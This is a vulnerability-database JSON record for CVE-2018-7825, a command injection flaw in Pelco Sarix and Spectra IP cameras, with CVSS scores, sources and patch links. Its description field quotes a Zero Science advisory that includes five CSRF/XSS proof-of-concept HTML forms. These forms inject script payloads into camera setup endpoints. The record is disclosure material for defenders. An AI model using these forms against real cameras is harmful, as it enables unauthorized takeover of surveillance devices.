"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2018-7825"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Vulnerability discovered by Gjoko Krstic",
"sources": [
{
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"db": "ZSL",
"id": "ZSL-2017-5415"
}
],
"trust": 0.2
},
"cve": "CVE-2018-7825",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.0,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "Single",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 6.5,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2018-7825",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CNVD-2017-23302",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.0,
"id": "CNVD-2019-16261",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2018-7825",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2018-7825",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2017-23302",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNVD",
"id": "CNVD-2019-16261",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201905-911",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "ZSL",
"id": "ZSL-2017-5417",
"trust": 0.1,
"value": "(4/5)"
},
{
"author": "ZSL",
"id": "ZSL-2017-5415",
"trust": 0.1,
"value": "(3/5)"
}
]
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"db": "ZSL",
"id": "ZSL-2017-5415"
},
{
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"db": "CNVD",
"id": "CNVD-2019-16261"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015518"
},
{
"db": "NVD",
"id": "CVE-2018-7825"
},
{
"db": "CNNVD",
"id": "CNNVD-201905-911"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "A Command Injection vulnerability exists in the web-based GUI of the 1st Gen PelcoSarix Enhanced Camera that could allow a remote attacker to execute arbitrary commands. Pelco Sarix Enhanced and Spectra Enhanced PTZ Camera Contains a command injection vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. PelcoSarix/SpectraCameras is a camera from Pelco. SchneiderElectric1stGenPelcoSarixEnhancedCamera is a series of fixed IP cameras from Schneider Electric, France. The vulnerability stems from the fact that external input data constructs executable commands, and the network system or product does not properly filter the special elements. An attacker could exploit the vulnerability to execute an illegal command. Pelco offers the broadest selection of IP cameras designedfor security surveillance in a wide variety of commercial and industrialsettings. The POST parameter \u0027enable_leds\u0027 locatedin the update() function called via the GeneralSetupController.phpscript is not properly sanitised before being used in writeLedConfig()function to enable led state to on or off. A remote attacker canexploit this issue and execute arbitrary system commands grantingher system access with root privileges using a specially craftedrequest and escape sequence to system shell.Tested on: Linux 2.6.10_mvl401-1721-pelco_evolution #1 Tue Nov 18 21:15:30 EST 2014 armv5tejl unknownMontaVista(R) Linux(R) Professional Edition 4.0.1 (0600980)Lighttpd/1.4.28PHP/5.3.0. \nSchneider Electric Pelco Sarix/Spectra Cameras Multiple XSS Vulnerabilities\n\n\nVendor: Schneider Electric SE\nProduct web page: https://www.pelco.com\nAffected version: Sarix Enhanced - Model: IME219 (Firmware: 2.1.2.0.8280-A0.0)\n Sarix Enhanced - Model: IME119 (Firmware: 2.1.2.0.8280-A0.0)\n Sarix - Model: D5230 (Firmware: 1.9.2.23-20141118-1.9330-A1.10722)\n Sarix - Model: ID10DN (Firmware: 1.8.2.18-20121109-1.9110-O3.8503)\n Spectra Enhanced - Model: D6230 (Firmware: 2.2.0.5.9340-A0.0)\n\nSummary: Pelco offers the broadest selection of IP cameras designed\nfor security surveillance in a wide variety of commercial and industrial\nsettings. From our industry-leading fixed and high-speed IP cameras to\npanoramic, thermal imaging, explosionproof and more, we offer a camera\nfor any environment, any lighting condition and any application. \nWhen nothing but the best will do. SarixaC/ Enhanced Range cameras\nprovide the most robust feature-set for your mission-critical applications. \nWith SureVisionaC/ 3.0, Sarix Enhanced delivers the best possible image\nin difficult lighting conditions such as a combination of bright areas,\nshaded areas, and intense light. Designed with superior reliability,\nfault tolerance, and processing speed, these rugged fixed IP cameras\nensure you always get the video that you need. \n\nDesc: Pelco cameras suffer from multiple dom-based, stored and reflected\nXSS vulnerabilities when input passed via several parameters to several\nscripts is not properly sanitized before being returned to the user. \n\nTested on: Linux 2.6.10_mvl401-1721-pelco_evolution #1 Tue Nov 18 21:15:30 EST 2014 armv5tejl unknown\n MontaVista(R) Linux(R) Professional Edition 4.0.1 (0600980)\n Lighttpd/1.4.28\n PHP/5.3.0\n\n\nVulnerability discovered by Gjoko \u0027LiquidWorm\u0027 Krstic\n @zeroscience\n\n\nAdvisory ID: ZSL-2017-5415\nAdvisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5415.php\n\n\n07.04.2017\n\n--\n\n\nCSRF/XSS on username parameter:\n-------------------------------\n\n\u003chtml\u003e\n \u003cbody\u003e\n \u003cscript\u003ehistory.pushState(\u0027\u0027, \u0027\u0027, \u0027/\u0027)\u003c/script\u003e\n \u003cform action=\"http://192.168.1.1/setup/network/dot1x/update\" method=\"POST\"\u003e\n \u003cinput type=\"hidden\" name=\"dot1x\" value=\"on\" /\u003e\n \u003cinput type=\"hidden\" name=\"protocol\" value=\"EAP\u0026#45;TLS\" /\u003e\n \u003cinput type=\"hidden\" name=\"inner\u0026#95;auth\" value=\"CHAP\" /\u003e\n \u003cinput type=\"hidden\" name=\"username\" value=\u0027\"\u003e\u003cscript\u003ealert(1)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"password\" value=\"blah\" /\u003e\n \u003cinput type=\"hidden\" name=\"anonymous\u0026#95;id\" value=\"\u0026#13;\" /\u003e\n \u003cinput type=\"hidden\" name=\"ca\u0026#95;certificate\" value=\"test\" /\u003e\n \u003cinput type=\"hidden\" name=\"client\u0026#95;certificate\" value=\"test\" /\u003e\n \u003cinput type=\"hidden\" name=\"private\u0026#95;key\" value=\"test\" /\u003e\n \u003cinput type=\"hidden\" name=\"private\u0026#95;key\u0026#95;password\" value=\"test\" /\u003e\n \u003cinput type=\"submit\" value=\"Submit request\" /\u003e\n \u003c/form\u003e\n \u003c/body\u003e\n\u003c/html\u003e\n\n\nCSRF/XSS on gateway, hostname, ip_address, nameservers, http_port, rtsp_port and subnet_mask parameter:\n-------------------------------------------------------------------------------------------------------\n\n\u003chtml\u003e\n \u003cbody\u003e\n \u003cscript\u003ehistory.pushState(\u0027\u0027, \u0027\u0027, \u0027/\u0027)\u003c/script\u003e\n \u003cform action=\"http://192.168.1.1/setup/network/general/update\" method=\"POST\"\u003e\n \u003cinput type=\"hidden\" name=\"hostname\" value=\u0027\"\u003e\u003cscript\u003ealert(2)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"http\u0026#95;port\" value=\u0027\"\u003e\u003cscript\u003ealert(3)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"rtsp\u0026#95;port\" value=\u0027\"\u003e\u003cscript\u003ealert(4)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"dhcp\" value=\"off\" /\u003e\n \u003cinput type=\"hidden\" name=\"ip\u0026#95;address\" value=\u0027\"\u003e\u003cscript\u003ealert(5)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"subnet\u0026#95;mask\" value=\u0027\"\u003e\u003cscript\u003ealert(6)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"gateway\" value=\u0027\"\u003e\u003cscript\u003ealert(7)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"nameservers\" value=\u0027\"\u003e\u003cscript\u003ealert(8)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"submit\" value=\"Submit request\" /\u003e\n \u003c/form\u003e\n \u003c/body\u003e\n\u003c/html\u003e\n\n\nCSRF/XSS on version parameter:\n------------------------------\n\n\u003chtml\u003e\n \u003cbody\u003e\n \u003cscript\u003ehistory.pushState(\u0027\u0027, \u0027\u0027, \u0027/\u0027)\u003c/script\u003e\n \u003cform action=\"http://192.168.1.1/setup/network/snmp/update\" method=\"POST\"\u003e\n \u003cinput type=\"hidden\" name=\"version\" value=\u0027\";alert(9)//\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"v2\u0026#95;community\u0026#95;string\" value=\"public\" /\u003e\n \u003cinput type=\"hidden\" name=\"v2\u0026#95;receiver\u0026#95;address\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"v2\u0026#95;trap\u0026#95;community\u0026#95;string\" value=\"trapbratce\" /\u003e\n \u003cinput type=\"submit\" value=\"Submit request\" /\u003e\n \u003c/form\u003e\n \u003c/body\u003e\n\u003c/html\u003e\n\n\nCSRF/XSS on device_name, ntp_server, region, smtp_server and zone parameter:\n----------------------------------------------------------------------------\n\n\u003chtml\u003e\n \u003cbody\u003e\n \u003cscript\u003ehistory.pushState(\u0027\u0027, \u0027\u0027, \u0027/\u0027)\u003c/script\u003e\n \u003cform action=\"http://192.168.1.1/setup/system/general/update\" method=\"POST\"\u003e\n \u003cinput type=\"hidden\" name=\"device\u0026#95;name\" value=\u0027ZSL\"\u003e\u003cscript\u003ealert(10)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"enable\u0026#95;leds\" value=\"on\" /\u003e\n \u003cinput type=\"hidden\" name=\"smtp\u0026#95;server\" value=\u0027\"\u003e\u003cscript\u003ealert(11)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"ntp\u0026#95;server\u0026#95;from\u0026#95;dhcp\" value=\"false\" /\u003e\n \u003cinput type=\"hidden\" name=\"ntp\u0026#95;server\" value=\"\u0027;alert(12)//\u0027\" /\u003e\n \u003cinput type=\"hidden\" name=\"region\" value=\"Macedonia\u0027;alert(13)//\" /\u003e\n \u003cinput type=\"hidden\" name=\"zone\" value=\"Kumanovo\u0027;alert(14)//\" /\u003e\n \u003cinput type=\"hidden\" name=\"enable\u0026#95;time\u0026#95;overlay\" value=\"on\" /\u003e\n \u003cinput type=\"hidden\" name=\"enable\u0026#95;name\u0026#95;overlay\" value=\"off\" /\u003e\n \u003cinput type=\"hidden\" name=\"position\" value=\"topright\" /\u003e\n \u003cinput type=\"hidden\" name=\"date\u0026#95;format\" value=\"0\" /\u003e\n \u003cinput type=\"submit\" value=\"Submit request\" /\u003e\n \u003c/form\u003e\n \u003c/body\u003e\n\u003c/html\u003e\n\n\nXSS on ftp_base_path, ftp_server, ftp_username, ftp_password and name parameter:\n--------------------------------------------------------------------------------\n\n\u003chtml\u003e\n \u003cbody\u003e\n \u003cscript\u003ehistory.pushState(\u0027\u0027, \u0027\u0027, \u0027/\u0027)\u003c/script\u003e\n \u003cform action=\"http://192.168.1.1/setup/events/handlers/update\" method=\"POST\"\u003e\n \u003cinput type=\"hidden\" name=\"id\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"relay\u0026#95;sentinel\" value=\"relay\u0026#95;sentinel\" /\u003e\n \u003cinput type=\"hidden\" name=\"name\" value=\u0027\"\u003e\u003cscript\u003ealert(15)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"type\" value=\"Ftp\" /\u003e\n \u003cinput type=\"hidden\" name=\"email\u0026#95;to\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"email\u0026#95;from\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"email\u0026#95;subject\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"email\u0026#95;message\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"dest\u0026#95;name\" value=\"IMG\u0026#37;m\u0026#37;d\u0026#37;Y\u0026#37;H\u0026#37;M\u0026#37;S\u0026#46;jpg\" /\u003e\n \u003cinput type=\"hidden\" name=\"limit\u0026#95;size\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"limit\u0026#95;size\u0026#95;scale\" value=\"K\" /\u003e\n \u003cinput type=\"hidden\" name=\"ftp\u0026#95;server\" value=\u0027\"\u003e\u003cscript\u003ealert(16)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"ftp\u0026#95;username\" value=\u0027\"\u003e\u003cscript\u003ealert(17)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"ftp\u0026#95;password\" value=\u0027\"\u003e\u003cscript\u003ealert(18)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"ftp\u0026#95;base\u0026#95;path\" value=\u0027\"\u003e\u003cscript\u003ealert(19)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"ftp\u0026#95;dest\u0026#95;name\" value=\"IMG\u0026#37;m\u0026#37;d\u0026#37;Y\u0026#37;H\u0026#37;M\u0026#37;S\u0026#46;jpg\" /\u003e\n \u003cinput type=\"hidden\" name=\"relay\u0026#95;bankName\" value=\"GPIO\" /\u003e\n \u003cinput type=\"hidden\" name=\"relay\u0026#95;index\" value=\"0\" /\u003e\n \u003cinput type=\"hidden\" name=\"relay\u0026#95;on\u0026#95;time\" value=\"0\u0026#46;1\" /\u003e\n \u003cinput type=\"hidden\" name=\"relay\u0026#95;off\u0026#95;time\" value=\"0\u0026#46;1\" /\u003e\n \u003cinput type=\"hidden\" name=\"relay\u0026#95;pulse\u0026#95;count\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"filter\u0026#95;start0\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"filter\u0026#95;stop0\" value=\"\" /\u003e\n \u003cinput type=\"submit\" value=\"Submit request\" /\u003e\n \u003c/form\u003e\n \u003c/body\u003e\n\u003c/html\u003e\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-7825"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015518"
},
{
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"db": "CNVD",
"id": "CNVD-2019-16261"
},
{
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"db": "ZSL",
"id": "ZSL-2017-5415"
},
{
"db": "PACKETSTORM",
"id": "143313"
}
],
"trust": 2.97
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.zeroscience.mk/codes/pelco_rce.txt",
"trust": 0.1,
"type": "poc"
},
{
"reference": "https://www.zeroscience.mk/codes/pelco_xss.txt",
"trust": 0.1,
"type": "poc"
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"db": "ZSL",
"id": "ZSL-2017-5415"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-7825",
"trust": 3.0
},
{
"db": "SCHNEIDER",
"id": "SEVD-2019-045-03",
"trust": 2.4
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015518",
"trust": 0.8
},
{
"db": "EXPLOIT-DB",
"id": "42307",
"trust": 0.7
},
{
"db": "EXPLOITDB",
"id": "42307",
"trust": 0.6
},
{
"db": "CNVD",
"id": "CNVD-2017-23302",
"trust": 0.6
},
{
"db": "CNVD",
"id": "CNVD-2019-16261",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201905-911",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "143313",
"trust": 0.2
},
{
"db": "ZSL",
"id": "ZSL-2017-5415",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "143315",
"trust": 0.1
},
{
"db": "NVD",
"id": "CVE-2018-7829",
"trust": 0.1
},
{
"db": "CXSECURITY",
"id": "WLB-2017070080",
"trust": 0.1
},
{
"db": "EXPLOIT-DB",
"id": "42309",
"trust": 0.1
},
{
"db": "ZSL",
"id": "ZSL-2017-5417",
"trust": 0.1
},
{
"db": "NVD",
"id": "CVE-2018-7827",
"trust": 0.1
},
{
"db": "CXSECURITY",
"id": "WLB-2017070075",
"trust": 0.1
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"db": "ZSL",
"id": "ZSL-2017-5415"
},
{
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"db": "CNVD",
"id": "CNVD-2019-16261"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015518"
},
{
"db": "PACKETSTORM",
"id": "143313"
},
{
"db": "NVD",
"id": "CVE-2018-7825"
},
{
"db": "CNNVD",
"id": "CNNVD-201905-911"
}
]
},
"id": "VAR-201905-1049",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"db": "CNVD",
"id": "CNVD-2019-16261"
}
],
"trust": 2.2
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"ICS",
"Network device"
],
"sub_category": null,
"trust": 0.6
},
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"db": "CNVD",
"id": "CNVD-2019-16261"
}
]
},
"last_update_date": "2023-12-18T12:18:59.259000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "SEVD-2019-045-03",
"trust": 0.8,
"url": "https://www.schneider-electric.com/en/download/document/sevd-2019-045-03/"
},
{
"title": "SchneiderElectric1stGenPelcoSarixEnhancedCamera command to inject vulnerability patches",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/162753"
},
{
"title": "Schneider Electric 1st Gen Pelco Sarix Enhanced Camera Fixes for command injection vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=92889"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-16261"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015518"
},
{
"db": "CNNVD",
"id": "CNNVD-201905-911"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-77",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-015518"
},
{
"db": "NVD",
"id": "CVE-2018-7825"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.4,
"url": "https://www.schneider-electric.com/en/download/document/sevd-2019-045-03/"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-7825"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7825"
},
{
"trust": 0.7,
"url": "https://www.exploit-db.com/exploits/42307/"
},
{
"trust": 0.1,
"url": "https://www.exploit-db.com/exploits/42309/"
},
{
"trust": 0.1,
"url": "https://cxsecurity.com/issue/wlb-2017070080"
},
{
"trust": 0.1,
"url": "https://packetstormsecurity.com/files/143315"
},
{
"trust": 0.1,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/129667"
},
{
"trust": 0.1,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7829"
},
{
"trust": 0.1,
"url": "https://cxsecurity.com/issue/wlb-2017070075"
},
{
"trust": 0.1,
"url": "https://packetstormsecurity.com/files/143313"
},
{
"trust": 0.1,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/129665"
},
{
"trust": 0.1,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7827"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/setup/network/dot1x/update\""
},
{
"trust": 0.1,
"url": "http://192.168.1.1/setup/system/general/update\""
},
{
"trust": 0.1,
"url": "http://192.168.1.1/setup/events/handlers/update\""
},
{
"trust": 0.1,
"url": "http://192.168.1.1/setup/network/general/update\""
},
{
"trust": 0.1,
"url": "http://192.168.1.1/setup/network/snmp/update\""
},
{
"trust": 0.1,
"url": "https://www.pelco.com"
},
{
"trust": 0.1,
"url": "http://www.zeroscience.mk/en/vulnerabilities/zsl-2017-5415.php"
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"db": "ZSL",
"id": "ZSL-2017-5415"
},
{
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"db": "CNVD",
"id": "CNVD-2019-16261"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015518"
},
{
"db": "PACKETSTORM",
"id": "143313"
},
{
"db": "NVD",
"id": "CVE-2018-7825"
},
{
"db": "CNNVD",
"id": "CNNVD-201905-911"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"db": "ZSL",
"id": "ZSL-2017-5415"
},
{
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"db": "CNVD",
"id": "CNVD-2019-16261"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015518"
},
{
"db": "PACKETSTORM",
"id": "143313"
},
{
"db": "NVD",
"id": "CVE-2018-7825"
},
{
"db": "CNNVD",
"id": "CNNVD-201905-911"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-07-10T00:00:00",
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"date": "2017-07-10T00:00:00",
"db": "ZSL",
"id": "ZSL-2017-5415"
},
{
"date": "2017-08-28T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"date": "2019-06-02T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-16261"
},
{
"date": "2019-06-11T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-015518"
},
{
"date": "2017-07-11T04:32:15",
"db": "PACKETSTORM",
"id": "143313"
},
{
"date": "2019-05-22T20:29:01.183000",
"db": "NVD",
"id": "CVE-2018-7825"
},
{
"date": "2019-05-22T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201905-911"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-02-23T00:00:00",
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"date": "2019-02-23T00:00:00",
"db": "ZSL",
"id": "ZSL-2017-5415"
},
{
"date": "2017-08-28T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"date": "2019-06-02T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-16261"
},
{
"date": "2019-06-11T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-015518"
},
{
"date": "2019-05-28T13:00:47.650000",
"db": "NVD",
"id": "CVE-2018-7825"
},
{
"date": "2019-05-29T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201905-911"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201905-911"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Schneider Electric 1st Gen Pelco Sarix Enhanced Camera Command Injection Vulnerability",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-16261"
},
{
"db": "CNNVD",
"id": "CNNVD-201905-911"
}
],
"trust": 1.2
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "command injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201905-911"
}
],
"trust": 0.6
}
}
VAR-201905-1051
Vulnerability from variot - Updated: 2023-12-18 12:18A Cross-Site Scripting (XSS) vulnerability exists in the 1st Gen. Pelco Sarix Enhanced Camera and Spectra Enhanced PTZ Camera which a remote attacker can execute arbitrary HTML and script code in a user’s browser session. PelcoSarix/SpectraCameras is a camera from Pelco. SchneiderElectric1stGenPelcoSarixEnhancedCamera and SchneiderElectricSpectraEnhancedPTZCamera are products of Schneider Electric. SchneiderElectric1stGenPelcoSarixEnhancedCamera is a series of fixed IP cameras. The Schneider Electric SpectraEnhancedPTZCamera is a series of spherical IP cameras. The vulnerability stems from the fact that the web application did not fully verify that the request came from a trusted user. An attacker could exploit the vulnerability to send an unexpected request to the server through an affected client. Pelco offers the broadest selection of IP cameras designedfor security surveillance in a wide variety of commercial and industrialsettings. The POST parameter 'enable_leds' locatedin the update() function called via the 